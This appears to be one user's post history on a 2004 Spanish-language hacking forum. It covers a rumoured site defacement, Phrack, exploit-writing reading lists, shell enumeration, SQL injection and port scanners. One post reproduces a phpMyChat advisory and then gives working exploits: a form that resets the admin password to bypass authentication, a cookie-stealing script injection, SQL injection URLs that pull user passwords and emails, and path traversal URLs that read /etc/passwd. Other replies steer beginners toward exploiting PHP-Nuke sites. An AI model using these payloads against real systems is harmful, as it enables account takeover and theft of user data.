| |
 Mostrar Mensajes
|
|
Páginas: [1] 2 3 4 5 6 7
|
|
2
|
Forums Generales / Foro Libre / miarroba.com hackeada ?
|
en: 27 Septiembre 2004, 06:45
|
Segun se comenta en la red... Mbyte Ya fueron notificados los administradores,despues de un mensajito que se les dejo ahora la estan reestableciendo,veamos cuanto tiempo tardan en volver todo a la normalidad Miarroba Debido a un problema en el ISP, varias maquinas perdieron corriente y fueron accidentalmente rebotadas con la mala suerte que una de ellas ha sido la MySQL principal, este paron ha provocado una caida de miarroba.com durante 2 horas, aproximadamente desde las 00:00 hasta las 02:00 sera verdad el " defacement " de mi@, o solo una mentira, sera una escusa de miarroba el problrma de mysql ? habra sido hackeado mi@  , alguno sabe ? o vio algo ?  demen su opinion  ...saludos |
|
|
|
|
5
|
Forums Generales / Foro Libre / Esperando Phrack #62 !
|
en: 09 Julio 2004, 09:57
|
*** HOT NEWS ***
...preparing #62.... Wow...segun parece dentro de poco tendremos en nuestras manos el #62 de Phrack!!!, la verdad que estoy desesperado esperando este numero para ver que traen entres sus manos. Desde mi punto de vista y creo que que es el mismo que de muchos, Phrack contribuyo y contribuye muy buena informacion sobre el Hacking, Programacion, y en General el mundo Underground, desde sus aquellos años que comenzaron hasta estos dias, son muy buenos escritores,  , queria saber que esperan ustedes de este nuevo numero de phrack ? |
|
|
|
|
6
|
Seguridad Informática / Bugs y Exploits / PHPHeaven PHPMyChat Multiple Remote Vulnerabilities (0.14.5)
|
en: 20 Junio 2004, 06:40
|
phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific issues can affect the application:
phpMyChat is prone to a HTML injection vulnerability. The issue affects the 'input.php3' script. Due to a lack of sufficient sanitization of user-supplied data, this HTML Injection vulnerability may permit an attacker to inject malicious HTML or script code into the affected application. Users who are connected to this session would have the attacker supplied HTML code rendered in their browser in the context of the vulnerable site.
phpMyChat is prone to multiple SQL injection vulnerabilities. Again the issues are due to a failure of the application to properly sanitize user-supplied input. The problem presents itself when SQL syntax is passed through the URI parameters of the 'usersL.php3' script. The offending parameters are used in SQL queries prior to proper sanitization.
An authentication bypass vulnerability is reported to affect the phpMyChat authentication system. It is reported that by saving and modifying the phpMyChat authentication screen an attacker may potentially bypass the authentication system.
Finally phpMyChat is reported to be prone to a file disclosure vulnerability. A user who is authenticated as a site administrator can exploit the issue. The vulnerability presents itself because directory traversal sequences are not correctly sanitized from user-supplied data. It is reported that an attacker may disclose a target file by including a relative path including directory traversal sequences to the target file as a value for a URI parameter passed to the 'admin.php3' script.
ExploitsLas vulnerabilidades son: Authentication bypass HTML Injection SQL Injection File Disclosure LA verdad que es un completo set de vulnerabilidades , aora los correspondientes exploits Authentication bypass<HTML>
<HEAD>
<TITLE>phpMyChat exploit</TITLE>
</HEAD>
<BODY>
<FORM ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm">
<INPUT type="hidden" name="FORM_SEND" value="1">
<INPUT type="hidden" name="AUTH_USERNAME" value="admin">
<INPUT type="hidden" name="AUTH_PASSWORD" value="null">
<!-- INSERT -->
<INPUT type="hidden" name="do_not_login" value="false">
<!-- END INSERT -->
<INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="text" NAME="U" VALUE="admin">NAME *<BR>
<INPUT TYPE="text" NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR>
<INPUT TYPE="text" NAME="FIRSTNAME" VALUE="">FIRST NAME<BR>
<INPUT TYPE="text" NAME="LASTNAME" VALUE="">LAST NAME<BR>
<INPUT TYPE="radio" NAME="GENDER" VALUE="1" >male<BR>
<INPUT TYPE="radio" NAME="GENDER" VALUE="2" >female<BR>
<INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR>
<INPUT TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR>
<INPUT TYPE="text" NAME="EMAIL" VALUE="you@email.ru">
<INPUT type="checkbox" name="SHOWEMAIL" value="1" >show e-mail in public information<BR>
<INPUT TYPE="submit" NAME="submit_type" VALUE="Change">
</FORM>
</BODY>
</HTML>
HTML Injection<INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\">[CODE]"> <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"><script>alert(document.cookie)</script><a \""> http://www.example.com/chat/usersL.php3?L=russian&R='[SQL]
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*
File Disclosurehttp://www.example.com/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
http://[www.example.com/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/passwd%00
and
http://www.example.com/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
http://www.example.com/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=1 |
|
|
|
|
7
|
Seguridad Informática / Bugs y Exploits / Re: [MOD] ¿Manual de C/C++ orientado a Exploits?
|
en: 20 Junio 2004, 06:12
|
Hola, bueno, te cuento que hace tiempo comenze con este tema de los buffer overflow , exploits, format string y todos estos temas. Te cuento que al principiom me costo el tema, ya que no sabia mucho de programacion en c++, y mucho sobre socket, te recomiendo como dice neohex, empieses a entender primero lo que el te ha dado, y cuando lleges a entender y dominar eso, pues, te recomiendo lo siguiente : Fundamentos de buffer Overflow (español)http://bulma.net/body.phtml?nIdNoticia=660Dcoumentacion en español/ingles sobre OVERFLOW,FORMAT STRING, ADVANCED EXPLOTATION, y mashttp://www.shellcode.com.ar/en/docz.htmlEn estos textos, el que mas te recomiendo:Smashing the stack for fun and profit escrito por Aleph One Y para codear buffer overflow exploit, exploit remotos y muchas cosas mas.... Muchos textos lindos http://www.zone-h.org/en/download/category=32/Te cuento que hace 6 meses que estoy en este tema.Como una vez dijo rojodos en una post sobre su shellcode, esto es "hacking" ... si alguien tiene algunos sitios de cursos de ensamblador, hexadecimal, pues posteelo soy todo ojos , me olvidaba, SOICK2 debes estudiar eso ultimo que tambien he mencionado...adios Modificacion: Me estaba olvidando http://www.hakim.ws/textos/textos.htmlOtra colecion de teexto en español ...please el moderador de esta web que lo ponga como fijo a este post, o en la recopilacion de post, se lo agradeceria .... |
|
|
|
|
8
|
Seguridad Informática / Hacking Linux/Unix / Re: Estando en Shell
|
en: 09 Junio 2004, 04:34
|
conectate con el netcat a un determinado puerto, por ejeplo, al puerto 80 de algun servidor web, y fijate que veras una cadena de texto que dira algo asi: IIS 5.0 (Suponiendo que es microsoft iis) digamos, que la mayoria de los servicios en el puerto que utilizan , suelen dar a conocer su version, a ese texto se le llama barner . |
|
|
|
|
9
|
Seguridad Informática / Hacking Linux/Unix / Re: Estando en Shell
|
en: 08 Junio 2004, 11:13
|
|
Pues con privilegios de lectura y ejecucion , es una oportunidad de "hackear" el sistema...
Para obtener un poco de informacion con respecto a tus privilegios y del sistema ejecuta : uname -a ; id
Para saber la version de los servicios, casi siempre los banner de los programas te dicen que versiones son...
|
|
|
|
|
12
|
Seguridad Informática / Bugs y Exploits / Re: otra vez sql injection
|
en: 18 Abril 2004, 17:13
|
Hola, ante que todo te esplico algunas cosas y vamos a aclarar otras... el "codigo" ha aplicar como se lo aplica y en que parte detalladamente Te voy a explicar todo. Injection sql es una tecnica que permite a un atacante aplicar codigo sql en sistemas. Esto funcona buscadon mala programacion en lenguajes utilizados en servicios http para la conexion y uso de base de datos sql, en general son el uso de ASP Y PHP. Una mala programacion de los script puede llegar a permitir que algun usuario ajeno al sistema , pueda utilizar sentencias sql, sin tener privilegeios y pudiendo asi poder tener asceso total al sistema, como obtener informacion del mismo. Un error puede ser en la programacion de un sistema de logeo, un buscador, encuesta o cualquier script que utilize base de datos sql. Cuando me refiero a base de datos sql, pueden ser Mysql, MS SQL , entre otras. Para poder explotar esto es necesario conocer el lenguaje sql, y sus variante en base de datos Mysql y MS SQL, y el lenguaje T-SQL (Transac SQL, es una mejora de sql para el uso de aplicaciones cliente - servidor de base de datos sql). Sql no es algo facil de explotar, ya que requiere conocimiento de SQL , y practica con el lenguaje sql. Si quieres buscar vulnerabilidades sql, debes analizar detalladamente los script, basate en los sistema de logeo y validaciones de usuario (login.php login.asp etc) en buscadores, etc.. Tal ves no me esplike korrectamente en este post y no sea tan buen escritor , pero puede pasar por aki : http://www.datafull.com/datahack/informe.php?id=115 es muy buen texto de injection sql. se pone en una barrita que esta en el exploratod que por ejemplo en mozilla dice search no solo injection sql es aplicable por la barra de direcciones, puedes aplicarlo por medio de formularios, etc. busca mas hay mucha informacion en ingles muy buena... http://www.securityfocus.com. http://www.packetstormsecurity.org y mira mi weblgo uno que otro dia pongo algunos exploit de injection sql http://xatyro.blogia.com |
|
|
|
|
13
|
Seguridad Informática / Bugs y Exploits / Re: ¿Donde consigo esas iyecciones sql para hackear webs de php nuke?
|
en: 18 Abril 2004, 16:50
|
Bueno, la mayoria de los injection sql que encuentres aqui son para php nuke que generalmente esten parcheados, pues, puede ser que tengas poca suerte con la explotacion del mismo. La url que te akaban de dejar Crack_x es un exploit escrito en html y php , lo que nesesitas usarlo en un servidor que soporte php para utilizarlo, por ej Mi@. Lo demas exploiit para php nuke son utilizados por medio de url, es decir , solo tiene que agregar unas lineas a la url del php nuke por ej: http//s0yunj4k3rc0nphpnuk3.com/elexploitdephpnuke busca mas info, http://www.rzw.com.ar muy actulizada en noticias, o si no , http://www.securityfocus.com |
|
|
|
|
15
|
Seguridad Informática / Hacking Básico / Re: Nmap y exploit scanners
|
en: 11 Abril 2004, 18:35
|
El nmap solo es una scanner de puertos que tiene algunas opciones que lo hacen mejor que otros scanner de puertos, entre ellas el TCP SYN (half open) scanning, si tienes problemas con el nmap en windows, te recomiendo que leas aca http://www.beeeeee.net/nautopia/Nmap.htm , es muy buen texto, y te aclaro que el nmap no escanea bug. exploit scanners No se llaman exploit scanner, se llaman scanner de bug o vulnerabilidades, te recomiendo que uses el Nessus, el LANGuard (no mucho), el SSS, y el N-Sthealt, los puede descargar en esta misma web en la sección download, la desventajas es que los scanner utilizan scanneo de tipo TCP connect() , pues, esto implica que quedes logeados en lo servidores que scannes. Hace un tiempo salio una nueva version del olvidado superscan, la version es la 4, y esta trae nuevas caracteristicas que lo hacen muy buen scanner: Super Scan 4http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/superscan.htmSuperior scanning speed Support for unlimited IP ranges Improved host detection using multiple ICMP methods TCP SYN scanning UDP scanning (two methods) IP address import supporting ranges and CIDR formats Simple HTML report generation Source port scanning Fast hostname resolving Extensive banner grabbing Massive built-in port list description database IP and port scan order randomization A selection of useful tools (ping, traceroute, Whois etc) Extensive Windows host enumeration capability Desventajas: solo funciona en XP y 2000, espero que te sirva salu2 |
|
|
|
|
|
| |
|
